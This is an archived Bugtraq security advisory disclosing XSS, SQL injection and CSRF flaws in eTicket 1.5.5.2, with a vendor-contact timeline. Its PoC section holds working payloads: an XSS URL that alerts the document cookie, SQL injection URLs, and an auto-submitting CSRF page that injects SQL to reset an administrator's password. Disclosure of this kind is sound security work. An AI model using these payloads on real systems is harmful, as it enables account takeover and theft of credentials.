lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <579210b50801061122w4dcf1644t1b3a3750ed40f862@mail.gmail.com>
Date: Sun, 6 Jan 2008 20:22:23 +0100
From: L4teral <l4teral@...il.com>
To: bugtraq@...urityfocus.com
Subject: eTicket 1.5.5.2 Multiple Vulnerabilities

======================================================================
eTicket 1.5.5.2 Multiple Vulnerabilities
======================================================================

Author:          L4teral <l4teral [4t] gmail com>
Impact:          Cross Site Scripting
                 Cross Site Request Forgery
                 SQL Injection
Status:          patch not available


------------------------------
Affected software description:
------------------------------

Application:     eTicket
Version:         1.5.5.2 (other versions may also be affected)
Vendor:          http://eticket.sourceforge.net

Description:
eTicket is a PHP-based electronic (open source) support ticket system
based on osTicket, that can receive tickets via email (pop3/pipe) or
a web form. It also offers a ticket manager with many features.
An ideal helpdesk solution for any website.


--------------
Vulnerability:
--------------

1. The variable 's' is not properly sanitized leading to
   cross site scripting.

2. The script admin.php is prone to sql injections (admin
   privileges required).

3. The search of the application is prone to sql injection, which
   can be used to obtain login credentials or perform other
   malicious taks.
   The parameters 'status', 'sort' and 'way' are not properly
   sanitized before being used in a sql query.
   Exploitation requires valid user credentials, but as any user
   is able to create a ticket, an attacker can obtain valid login
   data without any problems.

4. The application is vulnerable to cross site request forgery.
   Combined with the "my account" part of the application
   being prone to sql injection, the password of an admin
   account can be set to an arbitrary value by just visiting
   a specially crafted website wile being logged in to the
   application. Normally, the current password has to be entered
   to change the password of an account. This can be circumvented
   in the described way by combining the two vulnerabilities.


------------
PoC/Exploit:
------------

1.
http://localhost/eTicket/view.php?s="><script>alert(document.cookie)</script>

2.
http://localhost/eTicket/admin.php?a=headers&msg=SQL'

3.
http://localhost/eTicket/search.php?s=advanced&text=test&cat=&status=open'SQL&search_submit=Search

4.
By visiting a page containing the following code, the password of a
logged in administrator will be set to "hacked".

<html>
<body>
<form id="csrf" name="csrf"
action="http://localhost/eTicket/admin.php?a=my" method="post">
<input type="hidden" name="a" value="my">
<input type="text" name="username" value="admin"><br>
<input type="text" name="name" value="admin"><br>
<input type="text" name="email" value="mail@...mple.org"><br>
<input type="password" name="password" value="') OR ('1'='1"><br>
<input type="password" name="npassword" value="hacked"><br>
<input type="password" name="vpassword" value="hacked"><br>
<textarea name="sig" cols="30" rows="5"></textarea><br>
<input type="submit" name="submit" value="Save Changes"><br>
</form>
<script language="JavaScript">document.getElementById('csrf').submit.click()</script>
</body>
</html>


---------
Timeline:
---------

2007-11-19 - vendor informed
The vendor responded, but after multiple attempts i did not get
a statement whether these vulnerabilities will get fixed
in a new version.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ